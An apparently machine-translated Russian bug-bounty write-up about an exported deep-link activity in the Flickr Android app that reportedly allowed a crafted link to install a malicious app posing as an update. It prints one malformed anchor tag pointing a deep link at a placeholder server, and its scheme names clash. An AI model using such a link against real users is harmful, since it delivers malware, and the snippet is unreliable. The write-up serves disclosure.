Используйте приложение Flickr для удаленной установки вредоносных приложений в качестве обновлений.
101 Ключевые слова:
- Ссылки на контент
- Обновить
- Flickr
Ссылки на контент
Тип ссылки, которая отправляет пользователей непосредственно в приложение, а не на веб-сайт или в магазин? Они используются для отправки пользователей прямо в определенные места в приложении, что экономит время и энергию пользователей, которые самостоятельно находят определенную страницу, что значительно улучшает взаимодействие с пользователем.
Глубокие ссылки делают это, указывая настраиваемую схему URL-адресов (универсальные ссылки iOS) или URL-адрес намерения (на устройствах Android), который открывает ваше приложение, если оно уже установлено. Глубокие ссылки также можно настроить для направления пользователей на определенные события или страницы, которые могут быть связаны с кампаниями, которые вы, возможно, захотите запустить.
Обновлять;
Процесс замены продукта более новой версией того же продукта. В компьютерной и бытовой электронике обновление — это замена аппаратного, программного обеспечения или встроенного программного обеспечения более новой или лучшей версией с целью обновления системы или улучшения ее характеристик.
Фликр;
Американский сервис хостинга изображений и видео, а также онлайн-сообщество был основан в Канаде со штаб-квартирой в США. Он был создан Ludicorp в 2004 году и является популярным способом для любителей и профессиональных фотографов размещать фотографии с высоким разрешением.
Создав учетную запись на Flickr, я захотел найти любую ошибку, о которой мог бы сообщить, и заработать на этом несколько долларов. Имейте в виду, что это приложение хорошо поддерживается, поэтому я не ожидал найти что-то жизненно важное. Но, как известно, нет ничего невозможного, просто тяжело. Охотники за ошибками сосредотачиваются только на веб-приложениях. Не многие пытаются взломать телефонные приложения, и давайте посмотрим правде в глаза, не слишком многие знают, как это сделать, потому что в дикой природе не так много руководств по этому поводу. Зная это, я ориентируюсь на их мобильное приложение. Через несколько часов с помощью декомпилятора мобильного приложения я обнаружил необычный баг.
Это схема активности в приложениях для Android, использующая их Deeplink и функцию удаленного обновления в мобильных устройствах Android. Я сделал ссылку, которая, как только вы нажмете на нее, установит на ваш мобильный телефон вредоносное приложение, действующее как обновление для вашего телефона.
Активность экспортируется, и к ней можно получить доступ через браузер. Когда любой WebView (в клиентском приложении или браузере) встречает URL-адрес flickrauth://etc, он автоматически запускает приложение Flickr.
Файл com/yahoo/mobile/client/android/flickr/activity/DeepLinkingActivity.java
Не вдаваясь в подробности, все, что мне нужно было сделать, это использовать этот фрагмент кода, чтобы удаленно злоупотреблять приложением flickr на телефонах людей. Использование веб-намерения <a href="smdm://yourserver.com"</a>
После успешной проверки моих выводов, чтобы убедиться, что они законны, я начал фантазировать о покупке нового компьютера на деньги, полученные в этом отчете, только чтобы узнать, что это был дубликат.
Несколько месяцев назад я сообщал о чем-то подобном, где я даже упомянул эту уязвимость, и я думал, что они просто не заметили этого, и кто-то другой снова сообщил об этом в виде индивидуального сообщения и получил его раньше меня. Но через некоторое время назад и вперед, потому что я не мог получить доступ к дублирующему отчету, они сказали мне, что человек сообщил об этой уязвимости за 2 года до меня, но по какой-то странности, я до сих пор не знаю, она была запечатана под каким-то засекреченным отчет.
Краткое содержание
Как я уже говорил, нет ничего невозможного, просто сложно, поэтому эту уязвимость до меня нашел кто-то другой. Некоторые пассажи должны быть непонятны для тех, кто только начинает работать в этой области, но это было сделано специально, чтобы уязвимость не эксплуатировалась, так как ее еще не исправили.